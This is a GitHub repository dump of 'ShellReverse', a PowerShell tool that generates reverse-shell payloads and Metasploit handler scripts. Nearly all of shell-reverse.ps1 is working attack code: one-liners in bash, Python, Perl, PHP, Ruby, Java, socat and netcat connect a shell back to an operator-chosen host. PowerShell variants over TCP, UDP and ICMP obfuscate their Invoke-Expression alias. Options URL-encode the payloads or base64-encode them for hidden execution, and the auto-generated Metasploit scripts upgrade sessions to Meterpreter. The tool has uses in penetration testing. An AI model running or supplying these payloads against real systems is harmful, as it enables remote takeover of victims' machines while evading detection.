├── README.md ├── example.gif └── shell-reverse.ps1 /README.md: -------------------------------------------------------------------------------- 1 | # ShellReverse 2 | 3 | ReverseShell is a simple PowerShell script that we can use for 1/ easing the process of creating a reverse shell (or inverse, as you prefer) with different payloads depending on the interpreter that supports the server (python, bash, perl, java, php or ruby) and 2 / automating the update to Meterpreter. 4 | 5 | # Usage 6 | 7 | Its syntax is very simple: 8 | 9 | ./shell-reverse.ps1 -Lhost 10.10.10.1 -Lport 4444 -payload -web -metasploit 10 | 11 | - payload: python, python3, bash, perl, php, ruby, java 12 | - web: encode the payload for URL (encoder) 13 | - metasploit: start Metasploit and leave it waiting for session to update it to Meterpreter 14 | 15 | # Install in Debian or Kali 16 | 17 | git clone https://github.com/Hackplayers/ReverseShell 18 | cd shellreverse 19 | sudo apt-get update > /dev/null 20 | wget http://http.us.debian.org/debian/pool/main/libu/libunwind/libunwind8_1.1-4.1_amd64.deb 21 | sudo dpkg -i libunwind8_1.1-4.1_amd64.deb 22 | wget http://archive.ubuntu.com/ubuntu/pool/main/i/icu/libicu55_55.1-7_amd64.deb 23 | sudo dpkg -i libicu55_55.1-7_amd64.deb 24 | wget https://github.com/PowerShell/PowerShell/releases/download/v6.0.0-alpha.13/powershell_6.0.0-alpha.13-1ubuntu1.16.04.1_amd64.deb 25 | sudo dpkg -i powershell_6.0.0-alpha.13-1ubuntu1.16.04.1_amd64.deb 26 | powershell 27 | ./shell-reverse.ps1 -LHOST 192.168.1.20 -LPORT 4444 -Lenguaje 28 | 29 | # Languaje 30 |    **Perl**   31 |    **Python**   32 |    **Python3**   33 |    **Ruby**   34 |    **PHP**   35 |    **Java**   36 |    **Bash**   37 |    **Netcat**   38 |    **PowershellTCP**   39 |    **PowerrshellUDP**   40 |    **PowershellICMP**   41 | 42 | 43 | # Video Example 44 | ![](https://github.com/cybervaca/ShellReverse/blob/master/example.gif) 45 | 46 | # AutoUpdate to Meterpreter 47 | -------------------------------------------------------------------------------- /example.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hackplayers/ReverseShell/1a344a01aa16cfece1704787b5bd745d4a3e14c1/example.gif -------------------------------------------------------------------------------- /shell-reverse.ps1: -------------------------------------------------------------------------------- 1 | param( 2 | [string]$Lhost=$null,[string]$Lport=$null,[switch]$web,[switch]$netcat,[switch]$python,[switch]$python3,[switch]$bash,[switch]$perl,[switch]$php,[switch]$ruby,[switch]$java,[switch]$xterm,[switch]$socat,[switch]$metasploit,[switch]$PowershellICMP,[switch]$PowershellTCP,[switch]$PowershellUDP 3 | 4 | ) 5 | 6 | 7 | 8 | 9 | $metasploit_perl = @" 10 | use exploit/multi/handler 11 | set payload cmd/unix/reverse_perl 12 | set LHOST $Lhost 13 | set LPORT $Lport 14 | set ExitOnSession false 15 | exploit -j -z 16 | 17 | x = 0 18 | sleep(1) 19 | 20 | print_status("Esperando session para actualizarla a meterpreter") 21 | while (x == 0) 22 | framework.sessions.each_pair do |sid,s| 23 | thost = s.session_host 24 | print_status("Detectada nueva session") 25 | self.run_single("use post/multi/manage/shell_to_meterpreter") 26 | self.run_single("set session 1") 27 | self.run_single("set LHOST $Lhost") 28 | self.run_single("set LPORT 12345") 29 | self.run_single("exploit") 30 | x += 2 31 | end 32 | sleep(1) 33 | end 34 | 35 | print_status("Shell actualizada a meterpreter") 36 | 37 | "@ 38 | 39 | $metasploit_python = @" 40 | use exploit/multi/handler 41 | set payload cmd/unix/reverse_python 42 | set LHOST $Lhost 43 | set LPORT $Lport 44 | set ExitOnSession false 45 | exploit -j -z 46 | 47 | x = 0 48 | sleep(1) 49 | 50 | print_status("Esperando session para actualizarla a meterpreter") 51 | while (x == 0) 52 | framework.sessions.each_pair do |sid,s| 53 | thost = s.session_host 54 | print_status("Detectada nueva session") 55 | self.run_single("use post/multi/manage/shell_to_meterpreter") 56 | self.run_single("set session 1") 57 | self.run_single("set LHOST $Lhost") 58 | self.run_single("set LPORT 12345") 59 | self.run_single("exploit") 60 | x += 2 61 | end 62 | sleep(1) 63 | end 64 | 65 | print_status("Shell actualizada a meterpreter") 66 | 67 | "@ 68 | 69 | $metasploit_ruby = @" 70 | use exploit/multi/handler 71 | set payload cmd/unix/reverse_ruby 72 | set LHOST $Lhost 73 | set LPORT $Lport 74 | set ExitOnSession false 75 | exploit -j -z 76 | 77 | x = 0 78 | sleep(1) 79 | 80 | print_status("Esperando session para actualizarla a meterpreter") 81 | while (x == 0) 82 | framework.sessions.each_pair do |sid,s| 83 | thost = s.session_host 84 | print_status("Detectada nueva session") 85 | self.run_single("use post/multi/manage/shell_to_meterpreter") 86 | self.run_single("set session 1") 87 | self.run_single("set LHOST $Lhost") 88 | self.run_single("set LPORT 12345") 89 | self.run_single("exploit") 90 | x += 2 91 | end 92 | sleep(1) 93 | end 94 | 95 | print_status("Shell actualizada a meterpreter") 96 | 97 | "@ 98 | 99 | $metasploit_java = @" 100 | use exploit/multi/handler 101 | set payload java/shell/reverse_tcp 102 | set LHOST $Lhost 103 | set LPORT $Lport 104 | set ExitOnSession false 105 | exploit -j -z 106 | 107 | x = 0 108 | sleep(1) 109 | 110 | print_status("Esperando session para actualizarla a meterpreter") 111 | while (x == 0) 112 | framework.sessions.each_pair do |sid,s| 113 | thost = s.session_host 114 | print_status("Detectada nueva session") 115 | self.run_single("use post/multi/manage/shell_to_meterpreter") 116 | self.run_single("set session 1") 117 | self.run_single("set LHOST $Lhost") 118 | self.run_single("set LPORT 12345") 119 | self.run_single("exploit") 120 | x += 2 121 | end 122 | sleep(1) 123 | end 124 | 125 | print_status("Shell actualizada a meterpreter") 126 | 127 | "@ 128 | 129 | $metasploit_bash = @" 130 | use exploit/multi/handler 131 | set payload cmd/unix/reverse_netcat 132 | set LHOST $Lhost 133 | set LPORT $Lport 134 | set ExitOnSession false 135 | exploit -j -z 136 | 137 | x = 0 138 | sleep(1) 139 | 140 | print_status("Esperando session para actualizarla a meterpreter") 141 | while (x == 0) 142 | framework.sessions.each_pair do |sid,s| 143 | thost = s.session_host 144 | print_status("Detectada nueva session") 145 | self.run_single("use post/multi/manage/shell_to_meterpreter") 146 | self.run_single("set session 1") 147 | self.run_single("set LHOST $Lhost") 148 | self.run_single("set LPORT 12345") 149 | self.run_single("exploit") 150 | x += 2 151 | end 152 | sleep(1) 153 | end 154 | 155 | print_status("Shell actualizada a meterpreter") 156 | 157 | "@ 158 | 159 | $metasploit_xterm = @" 160 | use exploit/multi/handler 161 | set payload cmd/unix/generic 162 | set LHOST $Lhost 163 | set LPORT $Lport 164 | set ExitOnSession false 165 | exploit -j -z 166 | 167 | x = 0 168 | sleep(1) 169 | 170 | print_status("Esperando session para actualizarla a meterpreter") 171 | while (x == 0) 172 | framework.sessions.each_pair do |sid,s| 173 | thost = s.session_host 174 | print_status("Detectada nueva session") 175 | self.run_single("use post/multi/manage/shell_to_meterpreter") 176 | self.run_single("set session 1") 177 | self.run_single("set LHOST $Lhost") 178 | self.run_single("set LPORT 12345") 179 | self.run_single("exploit") 180 | x += 2 181 | end 182 | sleep(1) 183 | end 184 | 185 | print_status("Shell actualizada a meterpreter") 186 | 187 | "@ 188 | 189 | $metasploit_php = @" 190 | use exploit/multi/handler 191 | set payload php/reverse_php 192 | set LHOST $Lhost 193 | set LPORT $Lport 194 | set ExitOnSession false 195 | exploit -j -z 196 | 197 | x = 0 198 | sleep(1) 199 | 200 | print_status("Esperando session para actualizarla a meterpreter") 201 | while (x == 0) 202 | framework.sessions.each_pair do |sid,s| 203 | thost = s.session_host 204 | print_status("Detectada nueva session") 205 | self.run_single("use post/multi/manage/shell_to_meterpreter") 206 | self.run_single("set session 1") 207 | self.run_single("set LHOST $Lhost") 208 | self.run_single("set LPORT 12345") 209 | self.run_single("exploit") 210 | x += 2 211 | end 212 | sleep(1) 213 | end 214 | 215 | print_status("Shell actualizada a meterpreter") 216 | 217 | "@ 218 | 219 | $banner1 = @" 220 | 221 | ██▀███ ▓█████ ██▒ █▓▓█████ ██▀███ ██████ ▓█████ ██████ ██░ ██ ▓█████ ██▓ ██▓ 222 | ▓██ ▒ ██▒▓█ ▀▓██░ █▒▓█ ▀ ▓██ ▒ ██▒▒██ ▒ ▓█ ▀ ▒██ ▒ ▓██░ ██▒▓█ ▀ ▓██▒ ▓██▒ 223 | ▓██ ░▄█ ▒▒███ ▓██ █▒░▒███ ▓██ ░▄█ ▒░ ▓██▄ ▒███ ░ ▓██▄ ▒██▀▀██░▒███ ▒██░ ▒██░ 224 | ▒██▀▀█▄ ▒▓█ ▄ ▒██ █░░▒▓█ ▄ ▒██▀▀█▄ ▒ ██▒▒▓█ ▄ ▒ ██▒░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██░ 225 | ░██▓ ▒██▒░▒████▒ ▒▀█░ ░▒████▒░██▓ ▒██▒▒██████▒▒░▒████▒ ▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒ 226 | ░ ▒▓ ░▒▓░░░ ▒░ ░ ░ ▐░ ░░ ▒░ ░░ ▒▓ ░▒▓░▒ ▒▓▒ ▒ ░░░ ▒░ ░ ▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░░ ▒░▓ ░ 227 | ░▒ ░ ▒░ ░ ░ ░ ░ ░░ ░ ░ ░ ░▒ ░ ▒░░ ░▒ ░ ░ ░ ░ ░ ░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░ ░ ▒ ░ 228 | ░░ ░ ░ ░░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ 229 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 230 | ░ 231 | 232 | 233 | CyberVaca @ HackPlayers 234 | "@ 235 | 236 | Write-Host $banner1 -ForegroundColor red 237 | if ($Lhost -eq "" -or $Lhost -eq "") { 238 | 239 | break 240 | 241 | } 242 | 243 | if ($netcat -eq $false -and $python -eq $false -and $python3 -eq $false -and $bash -eq $false -and $perl -eq $false -and $php -eq $false -and $ruby -eq $false -and $java -eq $false -and $PowershellICMP -eq $false -and $PowershellTCP -eq $false -and $PowershellUDP -eq $false -and $socat -eq $false) {Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host " Debes seleccionar el lenguaje de la shell `n`n" -ForegroundColor red; break } 244 | 245 | $r_socat = @" 246 | socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:$Lhost`:$Lport 247 | "@ 248 | 249 | 250 | $r_netcat = @" 251 | mknod /tmp/backpipe p ; /bin/sh 0/tmp/backpipe 252 | "@ 253 | 254 | $r_python = @" 255 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$Lhost",$Lport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 256 | "@ 257 | $r_bash = @" 258 | bash -i >& /dev/tcp/$Lhost/$Lport 0>&1 259 | "@ 260 | $r_perl = @" 261 | perl -e 'use Socket;$`i="$Lhost";`$p=$Lport;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in(`$p,inet_aton(`$i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 262 | "@ 263 | $r_php = @" 264 | php -r '`$sock=fsockopen("$Lhost",$Lport);exec("/bin/sh -i <&3 >&3 2>&3");' 265 | "@ 266 | $r_ruby = @" 267 | ruby -rsocket -e'f=TCPSocket.open("$Lhost",$Lport).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 268 | "@ 269 | $r_java = @" 270 | r = Runtime.getRuntime() 271 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/$Lhost/$Lport;cat <&5 | while read line; do \`$line 2>&5 >&5; done"] as String[]) 272 | p.waitFor()"@ 273 | $r_xterm = @" 274 | xterm -display $Lhost":"$Lport 275 | "@ 276 | 277 | $r_PowershellICMP = @" 278 | powershell.exe -c "`$ip='$LHOST'; `$x = 'cabesha-ei-chixaka'; Set-alias cabesha-ei-chixaka (`$x[`$true-10] + (`$x[[byte]('0x' + 'FF') - 265]) + `$x[[byte]('0x' + '9a') - 158]);`$ic=New-Object Net.NetworkInformation.Ping; `$po=New-Object Net.NetworkInformation.PingOptions; `$po.DontFragment=`$true; function f(`$b) { `$ic.Send(`$ip,60000,([text.encoding]::ASCII).GetBytes(`$b),`$po) }; `$p = -join('PS ',(gl).path,'> '); f(`$p); while (`$true) { `$r = f(''); if (!`$r.Buffer) { continue }; `$rs=([text.encoding]::ASCII).GetString(`$r.Buffer); if (`$rs.StartsWith('EXIT')) { exit }; if (`$rs.StartsWith('UPLOAD')) { [io.file]::AppendAllText('$env:Temp\a',`$rs.Substring(7)); f('.'); } else { try { `$rt=(cabesha-ei-chixaka -Command `$rs | Out-String); } catch { f(`$_) }; `$i=0; while (`$i -lt `$rt.length-120) { f(`$rt.Substring(`$i,120)); `$i -= -120; }; f(`$rt.Substring(`$i)); `$p = -join('PS ',(gl).path,'> '); f(`$p); }; }" 279 | "@ 280 | 281 | $r_PowershellTCP = @" 282 | powershell.exe -c "`$x = 'cabesha-ei-chixaka'; Set-alias cabesha-ei-chixaka (`$x[`$true-10] + (`$x[[byte]('0x' + 'FF') - 265]) + `$x[[byte]('0x' + '9a') - 158]);`$c = New-Object Net.Sockets.TCPClient('$Lhost',$Lport);`$str = `$c.GetStream();[byte[]]`$b = 0..65535|%{0};while((`$i = `$str.Read(`$b, 0, `$b.Length)) -ne 0){;`$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$b,0, `$i);`$sendback = (cabesha-ei-chixaka `$d 2>&1 | Out-String );`$sendback2 = `$sendback + 'PS ' + (pwd).Path + '> ';`$sb = ([text.encoding]::ASCII).GetBytes(`$sendback2);`$str.Write(`$sb,0,`$sb.Length);`$str.Flush()};`$c.Close()" 283 | "@ 284 | 285 | $r_PowershellUDP = @" 286 | powershell.exe -c "`$x = 'cabesha-ei-chixaka'; Set-alias cabesha-ei-chixaka (`$x[`$true-10] + (`$x[[byte]('0x' + 'FF') - 265]) + `$x[[byte]('0x' + '9a') - 158]);`$end = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse("$Lhost"),$Lport);`$c = New-Object System.Net.Sockets.UDPClient(53);[byte[]]`$bytes = 0..65535|%{0};`$sb = ([text.encoding]::ASCII).GetBytes('PS> ');`$c.Send(`$sb,`$sb.Length,`$end);while(`$true){;`$receivebytes = `$c.Receive([ref]`$end);`$returndata = ([text.encoding]::ASCII).GetString(`$receivebytes);`$sendback = (cabesha-ei-chixaka `$returndata 2>&1 | Out-String );`$sb = ([text.encoding]::ASCII).GetBytes(`$sendback);`$c.Send(`$sb,`$sb.Length,`$end)};`$c.Close()" 287 | "@ 288 | 289 | 290 | function encodebase64 {param($script) 291 | ############################################## Pasamos el script a base64 ############################################## 292 | $script = $script -replace "powershell.exe -c","" -replace '"',"" 293 | $Bytes = [System.Text.Encoding]::Unicode.GetBytes($script) 294 | $EncodedText =[Convert]::ToBase64String($Bytes) 295 | write-host "powershell.exe+-win+hidden+-enc+$EncodedText" 296 | ######################################################################################################################### 297 | } 298 | 299 | function encodedurl {param($script) 300 | $script -replace "\!","%21" -replace " ","%20" -replace "\$", "%24" -replace "'","%27" -replace ";","%3b" -replace ":","%3a" -replace ",","%2c" -replace "/","%2f" -replace '"',"%22" -replace "\[","%5b" -replace "\]","%5d" -replace "\=","%3d" -replace "\(","%28" -replace "\)","%29" -replace "\{","%7B" -replace "\}","%7D" -replace "\|","%7C" -replace "\>","%3E" -replace "\\","%5C";$total = $script.Length - 3; $script = $script.Substring(0,$total) 301 | 302 | } 303 | 304 | 305 | if ($web -eq $true) { 306 | 307 | Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host " Tu shell reversa es : `n`n" -ForegroundColor Green 308 | #$r_net 309 | 310 | if ($python3 -eq $true) {$r_python = encodedurl -script $r_python; $r_python = $r_python -replace "python","python3"; write-host "$r_python `n" } 311 | if ($python -eq $true) {$r_python = encodedurl -script $r_python; write-host "$r_python `n" } 312 | if ($bash -eq $true) {$r_bash = encodedurl -script $r_bash;write-host "$r_bash `n" } 313 | if ($perl -eq $true) {$r_perl = encodedurl -script $r_perl ;write-host "$r_perl `n"} 314 | if ($php -eq $true) {$r_php = encodedurl -script $r_php ;write-host "$r_php `n"} 315 | if ($ruby -eq $true) {$r_ruby = encodedurl -script $r_ruby ;write-host "$r_ruby `n"} 316 | if ($java -eq $true) {$r_java = encodedurl -script $r_java ;write-host "$r_java `n"} 317 | if ($xterm -eq $true) {$r_xterm = encodedurl -script $r_xterm ;write-host "$r_xterm `n"} 318 | if ($netcat -eq $true) {$r_netcat = encodedurl -script $r_netcat ;write-host "$r_netcat `n"} 319 | if ($socat -eq $true) {$r_socat = encodedurl -script $r_socat ; Write-Host "$r_socat `n"} 320 | if ($PowerShellICMP -eq $true) {encodebase64 -script $r_PowershellICMP; Write-Host "`n" ; Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host " Tu shell urlencoded : `n`n" -ForegroundColor Green ; encodedurl -script $r_PowershellICMP } 321 | if ($PowerShellTCP -eq $true ) {encodebase64 -script $r_PowershellTCP; Write-Host "`n"; Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host " Tu shell urlencoded : `n`n" -ForegroundColor Green; encodedurl -script $r_PowershellTCP} 322 | if ($PowerShellUDP -eq $true) {encodebase64 -script $r_PowershellUDP; Write-Host "`n"; Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host " Tu shell urlencoded : `n`n" -ForegroundColor Green; encodedurl -script $r_PowershellUDP} 323 | 324 | ################################################################################ Spawn tty shell ################################################################################ 325 | 326 | if ($python3 -eq $true ) {Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host "Spawning a TTY Shell : `n" -ForegroundColor Green ; Write-Host "python3 -c 'import pty; pty.spawn(`"/bin/sh`")'" } 327 | if ($python -eq $true ) {Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host "Spawning a TTY Shell : `n" -ForegroundColor Green ; Write-Host "python -c 'import pty; pty.spawn(`"/bin/sh`")'" } 328 | if ($bash -eq $true ) {Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host "Spawning a TTY Shell : `n" -ForegroundColor Green ; Write-Host "echo os.system('/bin/bash')" } 329 | if ($perl -eq $true ) {Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host "Spawning a TTY Shell : `n" -ForegroundColor Green ; Write-Host "perl —e 'exec `"/bin/sh`";'" } 330 | if ($ruby -eq $true ) {Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host "Spawning a TTY Shell : `n" -ForegroundColor Green ; Write-Host "ruby: exec `"/bin/sh`"" } 331 | 332 | 333 | ################################################################################ Metasploit ################################################################################ 334 | 335 | if ($python3 -eq $true -and $metasploit -eq $true) {$metasploit_python | Out-File -Encoding ascii -FilePath /tmp/reverse_shell.rc ; msfconsole -r /tmp/reverse_shell.rc} 336 | if ($python -eq $true -and $metasploit -eq $true) {$metasploit_python | Out-File -Encoding ascii -FilePath /tmp/reverse_shell.rc ; msfconsole -r /tmp/reverse_shell.rc} 337 | if ($bash -eq $true -and $metasploit -eq $true) {$metasploit_bash | Out-File -Encoding ascii -FilePath /tmp/reverse_shell.rc ; msfconsole -r /tmp/reverse_shell.rc} 338 | if ($perl -eq $true -and $metasploit -eq $true) {$metasploit_perl | Out-File -Encoding ascii -FilePath /tmp/reverse_shell.rc ; msfconsole -r /tmp/reverse_shell.rc} 339 | if ($ruby -eq $true -and $metasploit -eq $true) {$metasploit_ruby | Out-File -Encoding ascii -FilePath /tmp/reverse_shell.rc ; msfconsole -r /tmp/reverse_shell.rc} 340 | if ($php -eq $true -and $metasploit -eq $true) {$metasploit_php | Out-File -Encoding ascii -FilePath /tmp/reverse_shell.rc ; msfconsole -r /tmp/reverse_shell.rc} 341 | if ($java -eq $true -and $metasploit -eq $true) {$metasploit_java | Out-File -Encoding ascii -FilePath /tmp/reverse_shell.rc ; msfconsole -r /tmp/reverse_shell.rc} 342 | if ($xterm -eq $true -and $metasploit -eq $true) {$metasploit_xterm | Out-File -Encoding ascii -FilePath /tmp/reverse_shell.rc ; msfconsole -r /tmp/reverse_shell.rc} 343 | if ($netcat -eq $true -and $metasploit -eq $true) {$metasploit_bash | Out-File -Encoding ascii -FilePath /tmp/reverse_shell.rc ; msfconsole -r /tmp/reverse_shell.rc} 344 | if ($PowershellICMP -eq $true -and $metasploit -eq $true) {Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host "Metasploit no compatible con PowerShellICMP (proximas updates...) `n" } 345 | if ($PowershellTCP -eq $true -and $metasploit -eq $true) {Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host "Metasploit no compatible con PowerShellTCP (proximas updates...)`n" } 346 | if ($Powershelludp -eq $true -and $metasploit -eq $true) {Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host "Metasploit no compatible con PowerShellUDP (proximas updates...)`n" } 347 | } 348 | 349 | else { 350 | 351 | Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host " Tu shell reversa es : `n`n" -ForegroundColor Green 352 | 353 | 354 | 355 | if ($netcat -eq $true) {write-host $r_netcat "`n" } 356 | if ($python -eq $true) {write-host $r_python "`n" } 357 | if ($python3 -eq $true) {$r_python = $r_python -replace "python", "python3" ;write-host $r_python "`n" } 358 | if ($bash -eq $true) {write-host $r_bash "`n" } 359 | if ($perl -eq $true) {write-host $r_perl "`n"} 360 | if ($php -eq $true) {write-host $r_php "`n"} 361 | if ($ruby -eq $true) {write-host $r_ruby "`n"} 362 | if ($java -eq $true) {write-host $r_java "`n"} 363 | if ($xterm -eq $true) {write-host $r_xterm "`n"} 364 | if ($socat -eq $true) {$r_socat = Write-Host "$r_socat `n"} 365 | if ($PowershellICMP -eq $true) {write-host $r_PowershellICMP "`n"} 366 | if ($PowershellTCP -eq $true) {write-host $r_PowershellTCP "`n"} 367 | if ($PowershellUDP -eq $true) {write-host $r_PowershellUDP "`n"} 368 | 369 | ################################################################################ Spawn tty shell ################################################################################ 370 | 371 | if ($python3 -eq $true ) {Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host "Spawning a TTY Shell : `n" -ForegroundColor Green ; Write-Host "python3 -c 'import pty; pty.spawn(`"/bin/bash`")'" } 372 | if ($python -eq $true ) {Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host "Spawning a TTY Shell : `n" -ForegroundColor Green ; Write-Host "python -c 'import pty; pty.spawn(`"/bin/bash`")'" } 373 | if ($bash -eq $true ) {Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host "Spawning a TTY Shell : `n" -ForegroundColor Green ; Write-Host "echo os.system('/bin/bash')" } 374 | if ($perl -eq $true ) {Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host "Spawning a TTY Shell : `n" -ForegroundColor Green ; Write-Host "perl —e 'exec `"/bin/bash`";'" } 375 | if ($ruby -eq $true ) {Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host "Spawning a TTY Shell : `n" -ForegroundColor Green ; Write-Host "ruby: exec `"/bin/bash`"" } 376 | if ($socat -eq $true) {Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host "Spawning a TTY Shell : `n" -ForegroundColor Green ; Write-Host "python -c 'import pty; pty.spawn(`"/bin/bash`")'" } 377 | 378 | ################################################################################ Metasploit ################################################################################ 379 | 380 | if ($python -eq $true -and $metasploit -eq $true) {$metasploit_python | Out-File -Encoding ascii -FilePath /tmp/reverse_shell.rc ; msfconsole -r /tmp/reverse_shell.rc} 381 | if ($bash -eq $true -and $metasploit -eq $true) {$metasploit_bash | Out-File -Encoding ascii -FilePath /tmp/reverse_shell.rc ; msfconsole -r /tmp/reverse_shell.rc} 382 | if ($perl -eq $true -and $metasploit -eq $true) {$metasploit_perl | Out-File -Encoding ascii -FilePath /tmp/reverse_shell.rc ; msfconsole -r /tmp/reverse_shell.rc} 383 | if ($ruby -eq $true -and $metasploit -eq $true) {$metasploit_ruby | Out-File -Encoding ascii -FilePath /tmp/reverse_shell.rc ; msfconsole -r /tmp/reverse_shell.rc} 384 | if ($php -eq $true -and $metasploit -eq $true) {$metasploit_php | Out-File -Encoding ascii -FilePath /tmp/reverse_shell.rc ; msfconsole -r /tmp/reverse_shell.rc} 385 | if ($java -eq $true -and $metasploit -eq $true) {$metasploit_java | Out-File -Encoding ascii -FilePath /tmp/reverse_shell.rc ; msfconsole -r /tmp/reverse_shell.rc} 386 | if ($xterm -eq $true -and $metasploit -eq $true) {$metasploit_xterm | Out-File -Encoding ascii -FilePath /tmp/reverse_shell.rc ; msfconsole -r /tmp/reverse_shell.rc} 387 | if ($netcat -eq $true -and $metasploit -eq $true) {$metasploit_bash | Out-File -Encoding ascii -FilePath /tmp/reverse_shell.rc ; msfconsole -r /tmp/reverse_shell.rc} 388 | if ($PowershellICMP -eq $true -and $metasploit -eq $true) {Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host "Metasploit no compatible con PowerShellICMP (proximas updates...) `n" } 389 | if ($PowershellTCP -eq $true -and $metasploit -eq $true) {Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host "Metasploit no compatible con PowerShellTCP (proximas updates...)`n" } 390 | if ($Powershelludp -eq $true -and $metasploit -eq $true) {Write-Host "[" -ForegroundColor Green -NoNewline ; Write-Host "+" -NoNewline -ForegroundColor red ;Write-Host "]" -ForegroundColor Green -NoNewline; Write-Host "Metasploit no compatible con PowerShellUDP (proximas updates...)`n" } 391 | 392 | } 393 | 394 | --------------------------------------------------------------------------------